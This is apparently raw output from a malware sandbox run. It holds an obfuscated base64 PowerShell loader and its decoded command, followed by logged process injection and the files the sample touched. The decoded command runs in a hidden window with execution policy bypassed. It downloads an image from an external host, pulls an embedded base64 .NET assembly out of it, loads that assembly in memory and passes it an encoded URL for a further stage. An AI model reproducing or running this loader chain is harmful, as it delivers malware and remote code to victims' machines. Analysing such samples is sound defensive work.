Q€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Process injection Process 904 resumed a thread in remote process 2264
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000000000035c
suspend_count: 1
process_identifier: 2264
1 0 0
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe